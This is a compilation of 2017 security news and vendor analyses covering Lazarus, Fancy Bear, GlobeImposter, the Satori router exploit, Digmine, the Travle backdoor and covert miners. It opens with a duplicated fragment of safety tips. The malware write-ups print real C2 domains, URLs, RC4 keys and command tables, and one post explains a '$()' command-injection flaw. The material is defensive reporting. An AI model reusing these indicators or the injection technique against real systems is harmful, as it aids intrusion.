If an attachment ends with .js, .vbs, .exe, .scr, or .bat, do not open them for any reason.
Scan attachments with tools like VirusTotal.
Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs.
Use hard passwords and never reuse the same password at multiple sites.
If you are interested in Indicators of Compromise give a look at the blog post.


Financially motivated attacks reveal the interests of the Lazarus APT Group
25.12.2017 securityaffairs APT

Researchers at security firm Proofpoint collected evidence of the significant interest of the Lazarus APT group in cryptocurrencies, the group’s arsenal of tools, implants, and exploits is extensive and under constant development.
Researchers at security firm Proofpoint collected evidence of the significant interest of the Lazarus APT group in cryptocurrencies. The North Korea-Linked hackers launched several multistage attacks that use cryptocurrency-related lures to infect victims with malware.

The malicious code aims to steal credentials for cryptocurrency wallets and exchanges, but there is much more.

“Proofpoint researchers have uncovered a number of multistage attacks that use cryptocurrency-related lures to infect victims with sophisticated backdoors and reconnaissance malware that we attribute to the Lazarus Group.” reads the analysis published by Proofpoint. “Victims of interest are then infected with additional malware including Gh0st RAT to steal credentials for cryptocurrency wallets and exchanges, enabling the Lazarus Group to conduct lucrative operations stealing Bitcoin and other cryptocurrencies.”

The Lazarus APT group has increasingly focused on financially motivated attacks in the attempt to exploit the media interest in the skyrocketing prices for cryptocurrencies.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

Lazarus is believed to be the first nation state attacker that is targeting a point-of-sale using a framework to steal payment card data.

The timing is perfect, the hackers are intensifying their operation around Christmas shopping season.

The arsenal of the Lazarus APT group includes sophisticated custom-made malware, DDoS botnets, and wiper malware.

The research paper published by the experts detail a new implant dubbed PowerRatankba, a PowerShell-based malware variant that closely resembles the original Ratankba implant.

Experts also documented a new and emerging threat dubbed RatankbaPOS targeting the point-of-sale systems.

Lazarus%20APT%20group%20attacks

“The Lazarus Group is a sophisticated, state-sponsored APT group with a long history of successful destructive, disruptive, and costly attacks on worldwide targets. State-sponsored groups are generally focused on espionage and disruption. However, our findings on their recent activities relate to the financially motivated arm of Lazarus, the operations of which are peculiar to the North Korean group.” said Patrick Wheeler, director of threat intelligence, Proofpoint.

“These actions, including the targeting of cryptocurrency exchange credentials and point-of-sale infrastructure, are significant for a number of reasons:

This appears to be the first publicly documented instance of a state-sponsored actor attacking point-of-sale infrastructure for financial gain.

Cryptocurrencies are nothing new to threat actors, state-sponsored or otherwise. However, in this case we were able to extensively document the custom-built tools and procedures that Lazarus group is using to perform cryptocurrency theft.

This group now appears to be targeting individuals rather than just organisations: individuals are softer targets, often lacking resources and knowledge to defend themselves and providing new avenues of monetisation for a state-sponsored threat actor’s toolkit. Bringing the tools and resources of a state-sponsored attack group to bear against individuals and infrastructure used by large numbers of private citizens raises the stakes considerably when assessing potential impact.

We were able to differentiate the actions of the financially motivated team within Lazarus from those of their espionage and disruption groups that have recently grabbed headlines, providing better insight into their operations and the worldwide threat represented by Lazarus.”


Facebook’s photo tagging system now looks for users in photos they’re not tagged in
24.12.2017 securityaffairs
Social

Facebook’s is rolling out a new feature for its photo tagging mechanism, it now looks for users in photos they’re not tagged in.
Facebook is rolling out a new feature for its photo tagging mechanism that will now scan newly uploaded photos and alert all the users it recognizes in that photo. The feature aims to detect if others might be attempting to abuse your image.

“Powered by the same technology we’ve used to suggest friends you may want to tag in photos or videos, these new features help you find photos that you’re not tagged in and help you detect when others might be attempting to use your image as their profile picture,” explained Joaquin Quiñonero Candela, Director, Applied Machine Learning at Facebook.

The photo tagging system analyzes every image Facebook users upload scanning for human faces, then it associates each face with a template composed of a string of numbers computed by the platform.

The photo tagging system compares this template to the face templates of other Facebook users included in any newly uploaded image, then it will send them a notification.

Facebook photo tagging

“Now, if you’re in a photo and are part of the audience for that post, we’ll notify you, even if you haven’t been tagged. You’re in control of your image on Facebook and can make choices such as whether to tag yourself, leave yourself untagged, or reach out to the person who posted the photo if you have concerns about it.” added Candela.

The new feature aims to curb any abuse of the social media platform.

Facebook announced new Tools for people with visual impairments, the social network platform will detect people not tagged in an image and inform the user who’s in the photo.

The updates to the photo tagging mechanism will not roll out in Canada and the EU due to local user privacy laws.

Users can disable photo tagging notifications if he won’t receive notifications when others upload photos of the user.


Russian Fancy Bear APT Group improves its weapons in ongoing campaigns
24.12.2017 securityaffairs APT

Fancy Bear APT group refactored its backdoor and improved encryption to make it stealthier and harder to stop.
The operations conducted by Russian Fancy Bear APT group (aka Sednit, APT28, and Sofacy, Pawn Storm, and Strontium) are even more sophisticated and hard to detect due to.
According to a new report published by experts from security firm ESET, the APT group recently refurbished one of its most popular backdoor, Xagent, that was significantly improved by implementing new functionalities that make it more stealthier and harder to stop.
Vxers have redesigned the architecture of the malware so it has become harder to recognize previously discovered infection patterns.
The X-Agent backdoor (aka Sofacy) was associated with several espionage campaigns attributed to the APT group Fancy Bear, across the years, experts observed several strains of the X-Agent specifically designed to compromise Windows, Linux, iOS and Android OSs, and early 2017 researchers at Bitdefender spotted the first version of the X-Agent that was developed to compromise MAC OS systems.

The latest version of the X-Agent backdoor, the fourth one, implements new techniques for obfuscating strings and all run-time type information. Cyberspies upgraded some of the code used for C&C purposes and added a new domain generation algorithm (DGA) feature in the WinHttp channel for quickly creating fallback C&C domains.

ESET observed a significant improvement in the encryption algorithm and DGA implementation that makes domain takeover more difficult.

Fancy Bear also implemented internal improvements, including new commands that can be used for hiding malware configuration data and other data on an infected system.

The attack chain remained largely unchanged, the APT group Fancy Bear still relies heavily on “very cleverly crafted phishing emails.”

“The attack usually starts with an email containing either a malicious link or malicious attachment. We have seen a shift in the methods they use ‘in the course of the year’, though. Sedkit was their preferred attack vector in the past, but that exploit kit has completely disappeared since late 2016.” reads the report published by ESET. “The DealersChoice exploit platform has been their preferred method since the publication of our white paper, but we saw other methods being used by this group, such as macros or the use of Microsoft Word Dynamic Data Exchange.”

Fancy Bear mail_merrychristmas

The group stopped using Sedkit exploit kit and has increasingly begun using a platform called DealersChoice, a Flash exploit framework also used by the group against Montenegro.

DealersChoice generates documents with embedded Adobe Flash Player exploits based on the target’ s configuration.

Fancy Bear’s operations are still focused on government departments and embassies all over the world.


Chinese authorities have sentenced a man to 5 years in prison for selling a VPN service without the authorization
24.12.2017 securityaffairs BigBrothers

The Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.
China continues to intensify the monitoring of the cyberspace applying, the authorities always fight any services that could be used to bypass its censorship system known as the Great Firewall.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

The Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

Since early this year, the Chinese authorities started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

People resident in the country make use of VPN and Proxy services to bypass the censorship implemented by the Great Firewall and access website prohibited by the Government without revealing their actual identity.

A Chinese court in the southern region of Guangxi sentenced Wu Xiangyang, a Chinese citizen from the Guangxi Zhuang autonomous region, for offering a non-licensed VPN service since 2013 until June 2017.

According to an announcement from China’s Procuratorate Daily on Wednesday, the man was also fined 500,000 yuan ($76,000).

“From 2013 to June 2017, Wu Xiangyang, the suspect Wu Xiang Yang, illegally profited without obtaining the relevant business license, set up his own VPN server on the Internet and provided a member account and login software which allows him to browse foreign websites ;” states the announcement .

“In addition the suspect Wu Xiangyang also some VPN member account password written to the hardware router, making the modified router can log in directly to the VPN, to achieve the ability to listen to foreign websites audio and video programs.”

Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Wu Xiangyang set up his “Where Dog VPN” website on a shop created on the shopping site “Taobao” and advertised it on social media sites.

It was a successful business for the Chinese man, in March 2016 the company claimed on Twitter to have 8,000 foreigners and 5,000 businesses using the VPN service to bypass censorship in the country.

In July, in compliance with Chinese Internet monitoring law, Apple has started removing all IOS VPN apps from it App Store in China.


Experts uncovered a new GlobeImposter Ransomware malspam campaign
24.12.2017 securityaffairs
Ransomware

Experts observed cybercriminals are conducting a new malspam campaign to distribute a new variant of the GlobeImposter ransomware
According to Lawrence Abrams from BleepingComputer, crooks are conducting a new malspam campaign to distribute a new variant of the GlobeImposter ransomware that appends the “..doc” extension to encrypted files.

The malicious messages pretend to have attached photos being sent to the recipient and have a subject line similar to “Emailing: IMG_20171221_”.

GlobeImposter ransomware

The messages include 7zip (.7z) archive attachments that are named after a camera photo’s filename such as IMG_[date]_[number]. The archive contains an obfuscated .js file, when victims double-click on will trigger the downloading of GlobeImposter ransomware from a remote server and execute it.

“After the executable is downloaded, it will be executed and the GlobeImposter ransomware will begin to encrypt the computer. When encrypting files on the computer it will append the ..doc extension to encrypted file’s name. For example, a file called 1.doc would be renamed to 1.doc..doc.” states the analysis published by Abrams.

Once encrypted the files, the GlobeImposter ransomware create a ransom note named Read___ME.html in each folder a file is encrypted. Victims are instructed to visit the http://n224ezvhg4sgyamb.onion/sup.php onion site that provides an email address to contact (server5@mailfence.com) to receive payment instructions and to decrypt one file for free. The note also includes a link to a support website that can be used by victims to send messages to the cyber criminals.

Lawrence confirmed that file encrypted by the GlobeImposter ransomware cannot be decrypted for free.
Below the list of recommendations provided by the experts to protect your system from ransomware attacks.

Backup, Backup, Backup!
Do not open attachments if you do not know who sent them.
Do not open attachments until you confirm that the person actually sent you them.
Enable the showing of file extensions.
If an attachment ends with .js, .vbs, .exe, .scr, or .bat, do not open them for any reason.
Scan attachments with tools like VirusTotal.
Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs.
Use hard passwords and never reuse the same password at multiple sites.
If you are interested in Indicators of Compromise give a look at the blog post.


US Intel Chiefs Sound Alarm on Overseas Web Spying Law
23.12.2017 securityweek BigBrothers
US intelligence chiefs on Thursday sounded the alarm about the imminent expiration of a law that allows them to spy on overseas web users, and called on Congress to renew it immediately.

"If Congress fails to reauthorize this authority, the Intelligence Community will lose valuable foreign intelligence information, and the resulting intelligence gaps will make it easier for terrorists, weapons proliferators, malicious cyber actors, and other foreign adversaries to plan attacks against our citizens and allies without detection," the intelligence chiefs said in an open letter to Congress.

The letter was signed by Director of National Intelligence Dan Coats, CIA Director Mike Pompeo, Attorney General Jeff Sessions, FBI chief Christopher Wray and the director of the National Security Agency (NSA) Michael Rogers.

The law they want extended, known as Article 702 of the Foreign Intelligence Surveillance Act (FISA), is set to expire at the end of the year, and Congress is preparing a temporary extension until January 19 as part of a short-term budget bill which will fund the federal government.

The House of Representatives was due to vote on the budget later Thursday, with a deadline to pass it by midnight Friday. The Senate will vote on it after that.

The law allows US intel agencies to spy on internet users abroad, including on platforms like Facebook and Skype. Congress initially passed the law in 2008 and renewed it in 2012, for five years.

"Short-term extensions are not the long-term answer either, as they fail to provide certainty, and will create needless and wasteful operational complications," said the intelligence heads in their statement.

Most members of Congress support renewing the law on the grounds of combating terrorism, but some on the far right and left have joined forces to try to restrict it, citing concerns that US citizens could be caught up in the overseas spying program.

By law, communications by US citizens cannot be legally intercepted and used except with a judge's warrant, unlike foreigners living overseas who do not benefit from the same constitutional protections as Americans.


Mirai Variant "Satori" Targets Huawei Routers
23.12.2017 securityweek BotNet
Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP - Universal Plug and Play).

The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.

By successfully exploiting the flaw, an attacker could download and execute a malicious payload onto the impacted devices. In this case, the payload was the Satori botnet, Check Point notes.

Huawei was informed on the vulnerability on November 27. Within days, the company published an advisory to confirm the vulnerability and inform users on available measures to circumvent or prevent the exploit: using the built-in firewall function, changing default passwords, deploying a firewall at the carrier side.

“The customers can deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade the IPS signature database to the latest version IPS_H20011000_2017120100 released on December 1, 2017 to detect and defend against this vulnerability exploits initiated from the Internet.” Huawei notes.

In this Satori attack, each bot is used to flood targets with manually crafted UDP or TCP packets. The bot first attempts to resolve the IP address of a command and control (C&C) server using DNS request with the hardcoded domain name, then gets the addresses from the DNS response and tries to connect via TCP on the hardcoded target port (7645).

The C&C server provides the number of packets used for the flooding action and their corresponding parameters, and can also pass an individual IP for attack or a subnet.

The bot’s binary, the researchers discovered, contains a lot of unused text strings, supposedly inherited from another bot or a previous version.

A custom protocol is used for C&C communication, which includes two hardcoded requests to check in with the server, which in turn responds with the parameters for launching distributed denial of service attacks.

While analyzing the incident, which involved the use of a zero-day and numerous servers to attack Huawei devices, the security researchers discovered that the actor behind the Satori botnet might be using the online handle of NexusZeta.

They were able to track the actor’s activity across several hacking forums and also discovered that NexusZeta is active on social media, most notably Twitter and Github, and has Skype and SoundCloud accounts under the name of Caleb Wilson (caleb.wilson37 / Caleb Wilson 37), but couldn’t determine if this is the attacker's real name.

Based on forum posts attributed to the actor, the researchers concluded that he isn’t an advanced actor, “but rather an amateur with lots of motivation, looking for the crowd’s wisdom.” What the security researchers couldn’t determine, however, was how the zero-day vulnerability arrived in the individual’s possession.

“Nonetheless, as seen in this case as well as others over the past year, it is clear that a combination of leaked malware code together with exploitable and poor IoT security, when used by unskilled hackers, can lead to disastrous results,” Check Point concludes.


Digmine Cryptocurrency Miner spreads via Facebook messenger
23.12.2017 securityaffairs
Social

Researchers from security firm Trend Micro observed crooks spreading a new cryptocurrency mining bot dubbed Digmine via Facebook Messenger.
Watch out for video file (packed in zip archive) sent by your friends via Facebook messenger, according to the researchers from security firm Trend Micro crooks are using this technique to spread a new cryptocurrency mining bot dubbed Digmine.

The bot was first observed in South Korea, experts named it Digmine based on the moniker (비트코인 채굴기 bot) referred to in a report of recent related incidents in South Korea. Digmine infections were observed in other countries such as Vietnam, Azerbaijan, Ukraine, Vietnam, Philippines, Thailand, and Venezuela.

Attackers are targeting Google Chrome desktop users to take advantage of the recent spike in the price of cryptocurrencies.

Digmine is a Monero-cryptocurrency mining bot disguises as a non-embedded video file, under the name video_xxxx.zip, but is actually includes an AutoIt script.

The infection starts after the victims click on the file, the malicious code compromise the system and downloads its components and related configuration files from a command-and-control server.

Digmine first installs a miner (i.e. miner.exe—a modified version of an open-source Monero miner known as XMRig) that silently mines the Monero cryptocurrency in the background. The bot also installs an autostart mechanism and launch Chrome with a malicious extension that allows attackers to control the victims’ Facebook profile and used it to spread the malware to the victim’s Messenger friends list.

“Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger’s desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended.” reads the analysis published by TrendMicro.

“Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. “

Researchers observed that since Chrome extensions can only be installed via official Chrome Web Store, crooks launch Chrome (loaded with the malicious extension) via command line.

“The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video” Trend Micro continues.

“The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components.”

Digmine

The technique doesn’t work when users open the malicious video file through the Messenger app on their mobile devices.

“The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.” continues the analysis.

Facebook had taken down most of the malware files from the social networking site.

Further info, including the IoCs are included in the report.


Satori is the latest Mirai botnet variant that is targeting Huawei HG532 home routers
23.12.2017 securityaffairs BotNet

Satori botnet, Mirai variant, is responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.
The Mirai botnet makes the headlines once again, a new variant dubbed Satori is responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

The activity of the Satori botnet has been observed over the past month by researchers from Check Point security.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point security.
Satori is an updated variant of the notorious Mirai botnet that was first spotted by the malware researchers MalwareMustDie in August 2016. The malicious code was developed to target IoT devices, the Sartori version targets port 37215 on Huawei HG532 devices.

The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.

satori

Experts observed that attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

“In this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP).

From looking into the UPnP description of the device, it can be seen that it supports a service type named `DeviceUpgrade`. This service is supposedly carrying out a firmware upgrade action by sending a request to “/ctrlt/DeviceUpgrade_1” (referred to as controlURL ) and is carried out with two elements named `NewStatusURL` and `NewDownloadURL`.” continues the analysis.

“The vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters “$()” in the NewStatusURL and NewDownloadURL”

satori attack

The successful exploitation of the vulnerability could allow an attacker to download and execute the Satori bot.

The flaw was reported to Huawei on November 27, after a few days, the company published a security advisory that notifies the vulnerability to the users and provides recommendations to prevent the exploitation of the flaw.

Customers can take the following measures to circumvent or prevent the exploit of this vulnerability. For details, consult the local service provider or Huawei TAC.

Configure the built-in firewall function.
Change the default password.
Deploy a firewall at the carrier side.
“The customers can deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade the IPS signature database to the latest version IPS_H20011000_2017120100 released on December 1, 2017 to detect and defend against this vulnerability exploits initiated from the Internet.” reads the andisory published by Huawei.

Each Satori bot floods targets with manually crafted UDP or TCP packets, they first attempt to resolve the IP address of a C&C server using DNS request with the hardcoded domain name, then gets the addresses from the DNS response and tries to connect via TCP on the hardcoded target port (7645).

The C&C server, in turn, provides the number of packets used for the flooding action and their corresponding parameters, and can also pass an individual IP for attack or a subnet.

The bot uses a custom protocol to communicate with the C&C, it includes two hardcoded requests to check in with the server that responds with the DDoS attack parameters.

The researchers that investigated the case determined that the actor behind the Satori botnet might be using the online handle of NexusZeta.

NexusZeta is very active on social media such as Twitter and Github, and has Skype and SoundCloud accounts under the name of Caleb Wilson (caleb.wilson37 / Caleb Wilson 37).

While the actor described himself as a novice (“an amateur with lots of motivation, looking for the crowd’s wisdom.”), it is unclear how he discovered the zero-day vulnerability .

“Nonetheless, as seen in this case as well as others over the past year, it is clear that a combination of leaked malware code together with exploitable and poor IoT security, when used by unskilled hackers, can lead to disastrous results,” Check Point concludes.


Travle aka PYLOT backdoor hits Russian-speaking targets
22.12.2017 Kaspersky
Virus
At the end of September, Palo Alto released a report on Unit42 activity where they – among other things – talked about PYLOT malware. We have been detecting attacks that have employed the use of this backdoor since at least 2015 and refer to it as Travle. Coincidentally, KL was recently involved in an investigation of a successful attack where Travle was detected, during which we conducted a deep analysis of this malware. So, with this intelligence ready we are sharing our findings in this blog to supplement Palo Alto’s research with additional details.

Technical Details
MD5 SIZE LINKER COMPILED ON
7643335D06BAEC5A14C95A393592EA3F 164352 11.0 2016-10-14 06:21:07
The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.

First of all, we detected numerous malicious documents being used in spear-phishing attacks with file names suggesting Russian-speaking targets with executables maintained in encrypted form:

This encryption method has been well known for a long time – it was first used in exploit documents to conceal Enfal, then we discovered this backdoor – Travle. Later documents with such encryption started maintaining another one APT family – Microcin. Travle C2 domains often overlap with those of Enfal. In regard to NetTraveler, at some point Enfal samples started using the same encryption method for maintaining the C2 URL as was used in NetTraveler:

Enfal sample with NetTraveler-like C2 string encryption

So, clearly these backdoors – Enfal, NetTraveler, Travle and Microcin – are all related to each other and are believed to have Chinese-speaking origins. And after finding the string “Travel path failed!” we believe that the Travle backdoor could be intended as a successor to the NetTraveler malware.

The malware starts by initializing the following variables:

%TEMP%\KB287640\ – local malware drop-zone
%TEMP%\KB887209\ – plugins storage
<malware install path>\~KB178495.DAT – configuration file path

Surprisingly, these paths remain the same in all samples of this family. If no configuration file is found, Travle reads the default settings from its resource “RAW_DATA“. Settings are maintained in an encrypted form. Here is the code for decryption:

for (i = size – 1; i > 1; –i)
buf[i] ^= buf[i – 2]

The storage format for the configuration block is as follows:

Offset Size Value
0 0x81 C2 domain
0x102 0x81 C2 URL path
0x204 2 C2 port (not used)
0x206 0xB not used
0x21C 0xB Sample ID
0x232 0x401 Bot’s first RC4 key
0xA34 0x401 Bot’s second RC4 key
0x1238 2 not used
The described sample maintains the following configuration data:

Field Value
C2 domain remember123321.com
C2 URL path /zzw/ash.py
Sample ID MjdfS0584
1st RC4 key mffAFe4bgaadbAzpoYRf
2nd RC4 key mffAFe4bgaadbAzpoYRf
The Travle backdoor starts its communication with the C2 by sending gathered information about the target operating system in an HTTP POST request to a URL built using the C2 domain and the path specified in the settings. The information sent includes the following data:

UserID – based on the computer name and IP-address
Computer name
Keyboard layout
OS version
IP-addresses
MAC-address
Once the C2 receives the first packet, it responds with a block of data containing the following information:

URL path for receiving commands
URL path for reporting on command execution results
URL path for downloading files from C2
URL path for uploading files to C2
C2 second RC4 key
C2 first RC4 key
C2 ID
After this packet has been received, Travle waits for additional commands from the server.

Communication encryption
The ciphering algorithm depends on the type of transmitted object. There are three possible variants:

Data
Data is ciphered with Base64
The resulting string is appended to the header with a size of 0x58 bytes
The resulting buffer is ciphered by RC4 with the C2 first RC4 key
The resulting buffer is ciphered with Base64
List of strings
Each line is ciphered by RC4 with the C2 second RC4 key
The resulting buffer is ciphered with Base64
All the previously Base64-ciphered strings are merged in one delimited with \r\n”
The resulting string is appended to the header with a size of 0x54 bytes
The resulting buffer is ciphered by RC4 with the C2 first RC4 key
The resulting buffer is ciphered with Base64
File
Compressed with LZO
The resulting archive is ciphered with the C2 second RC4 key
Messages format
The header for the transmitted data is as follows:

Offset (bytes) Size (bytes) Description
0 0x14 Random set of bytes
0x14 4 Data type / Command ordinal
0x18 4 NULL / Command ID
0x1C 4 Size of data
0x20 0x14 Sample ID
0x34 0x24 User ID
0x58 Size of data Data
The file is transferred to the C2 in a POST request as a multipart content type with boundary “kdncia987231875123nnm“. All samples of Travle we have discovered use this value.

Message types – from bot to C2
The command ID is specified at offset 0x18 in the header.

Technical messages are as follows:

ID Description Data content
1 Information about OS Information about OS
2 Request for the first command NULL
3 Request for the list of commands NULL
4 Command is successfully executed Information about command execution or the name of transmitted file
5 Command execution failed Information about an error
Operational messages are as follows:

ID Description Data content
1 Bot sends the list of files in the requested directory The list of files
11 Bot sends the content of the requested file The content of the file
Message types – from C2 to bot
In case of bot sending POST request C2 responses with data of following format:

ID Description Data content
0 Information about C2 The list of C2 parameters
1 Commands The list of commands
Bot also may send GET request for retrieving a specific file from the server. In this case, C2 responses with the requested file.

General communication between bot and C2
Interaction with C2 includes two stages:

1st (automatic – carried out with no operator actions). It consists of:

Sending information about the OS
Receiving information about C2
Sending a request for the first command
Receiving the command with ordinal 1 and first argument “*”
Sending the request for the next command
2nd (carried out by operators). It consists of:

Sending commands to the bot
Sending files to the bot
Sending results of the executed commands to the C2
Commands – general bot functionality
Ordinal Arguments Action
Scan File System
1 Path In case of “Path” is not “*”, the bot collects the list of files and folders in the specified directory with creation date between specified values and files with an “Encrypted” attribute.
If the “Path” is “*”, the search for files and folders is done in complete file system.
In any case, the search is recursive.
Minimum date
Maximum date
Run Process
2 Path to the batch or executable file The bot executes specified batch file or application with passed arguments.
Command line arguments
File Presence Test
4 File name The bot examines if specified file exists.
Delete File
3 File name File deletion.
Rename File
5 Old file name File renaming.
New file name
Move File
6 Old path File moving.
New path
Create New Config
7 Content of the new configuration The bot creates the file with new configuration.
Process File With Batch
48 Batch script The bot sends GET request to the C2 for downloading a file specified in one command argument. Batch script received in another command argument is saved in the file and executed with a parameter – file name of the downloaded file.
File path
Run Batch
49 Batch script The bot receives a BAT-file and executes it.
Download File
16 File path The bot sends a GET request for downloading a file. The file is saved with the specified name and location.
Upload File
17 File path The bot sends the content of a requested file in a POST message.
Download And Run Plugin
32 Plugin name The bot sends a GET request for downloading Plugin (DLL). Plugin is saved in the file system and launched with the use of the LoadLibrary API function.
Plugin argument
Unload Plugin
33 Plugin name The bot unloads a plugin library from memory.
Delete Plugin
34 Plugin name The bot unloads a plugin from memory and deletes the plugin file.
Load And Run Plugin
35 Plugin name The bot loads a plugin in memory with a specified parameter.
Plugin argument
Plugins
Unfortunately, we have been unable to receive plugins from any C2 found in examined Travle samples, but after analyzing the code of Travle we can briefly describe how they are handled.

Plugins are handled with the use of commands 32-35. From all the analyzed Travle samples, we found out that not every Travle sample is able to work with plugins.

Each plugin DLL is saved in a file and loaded with the use of the LoadLibrary API function. The DLL should export three functions: GetPluginInfo, Starting and FreeMemory. These functions are invoked one-by-one at the plugin DLL loading stage. When Travle has to unload the plugin DLL it calls the FreeLibrary API function.

In all analyzed Travle samples, plugins are saved in the same location: %TEMP%\KB887209\.

Conclusion
The actor or actors responsible for the Travle attack has been active during the last few years, apparently not worried about being tracked by AV companies. Usually, modifications and new additions to their arsenal are discovered and detected quite quickly. Still, the fact that they didn´t really need to change their TTPs during all these years seems to suggest that they don´t need to increase their sophistication level in order to fulfill their goals. What’s worse, according to subjects of decoy documents these backdoors are used primarily in the CIS region against government organizations, military entities and companies engaged in high-tech research, which indicates that even high-profile targets still have a long way to go to implement IT-sec best practices which efficiently resist targeted attacks.

We detect Travle samples with the following verdicts:

Trojan.Win32.Tpyn.*
Trojan.Win32.TravNet.*
Trojan-Spy.Win32.TravNet.*
HEUR:Trojan.Win32.Generic
HEUR:Trojan.Win32.TravNet.gen
HEUR:Backdoor.Win32.NetTraveler.gen


Nhash: petty pranks with big finances
22.12.2017 Kaspersky Security
According to our data, cryptocurrency miners are rapidly gaining in popularity. In an earlier publication we noted that cybercriminals were making use of social engineering to install this sort of software on users’ computers. This time, we’d like to dwell more on how exactly the computers of gullible users start working for cybercriminals.

Beware freebies

We detected a number of similar websites with offers to download various types of free software. Some of them really were free applications (such as OpenOffice), while others attempted to entice users with “free” software packages of Adobe Premiere Pro, CorelDraw, PowerPoint, etc. From the victim’s point of view, the software was indeed free – it didn’t ask for activation keys and could be used immediately. Moreover, the cybercriminals used domain names resembling those of recognized legitimate products, such as thefinereader.ru, theopenoffice.ru, etc. There was one thing all these apps had in common – they were installed on the victim computer along with a custom-configured version of cryptocurrency mining software from the NiceHash project.



All sites followed the same design template, differing only in their product descriptions and download links

Mining coins at any price
Kaspersky Lab’s products detect the NiceHash miner with the verdict not-a-virus:RiskTool.Win64.BitCoinMiner.cgi; it is not malicious according to Kaspersky Lab’s classification. According to KSN data, around 200 files are detected with this verdict. We chose the file FineReader-12.0.101.382.exe for analysis. It was obtained from the website thefinereader.ru which is no longer available; at this website, it was presented as a “free full version” of ABBYY FineReader. It should be noted that this hacked version, minus the miner component, has long been available on the internet via Torrent file distribution systems:

The executable file contains the installation package Inno Setup; unpacking it will produce a number of folders containing the actual software and its resources, as well as an installation guide script. The installer’s root folder looks like this:

The {app} folder is of interest to us; it contains the software that is installed. This folder contains a ‘portable’ version of FineReader:

The lib folder contains some suspicious-looking files:

Among these files is the NiceHash miner that we mentioned above. There are also text files in this folder that contain the information required to initialize the miner – namely the wallet details and the mining pool’s address. This folder will be installed stealthily to the victim computer while FineReader is installing.

A shortcut will also be created in the autorun folder:

The shortcut reveals the path to the miner’s work directory on the C drive:

That leaves the tskmgr.exe and system.exe files of interest for analysis. Both files are BAT scripts compiled into PE files. Let’s look at the contents of system.exe after extracting the BAT script:

It ensures the wallet’s address is up to date and initializes the miner’s operation. It contacts the following addresses:

http://176.9.42.149/tmp1.txt
http://176.9.42.149/tmp3.txt?user=default&idurl=3
http://176.9.42.149/tmp2.txt?user=3id170927143302
After the third query, the following response is received:

This is a PowerShell script that assigns a unique ID to the infected computer and launches mining with the correct wallet details (in this specific case, the zcash cryptocurrency is mined). IDs are generated following a specific algorithm based on the mining start time. For example, the ID 4v09v2017v03v24v26 is made up of the date (14.09.2017) and time (03:24:26).

We have also identified other types of covert miners with a slightly different logic. Below is the same Inno Setup installation package, but if we take a look at its contents, we can see lots of shortcuts:

Let’s take a look inside:

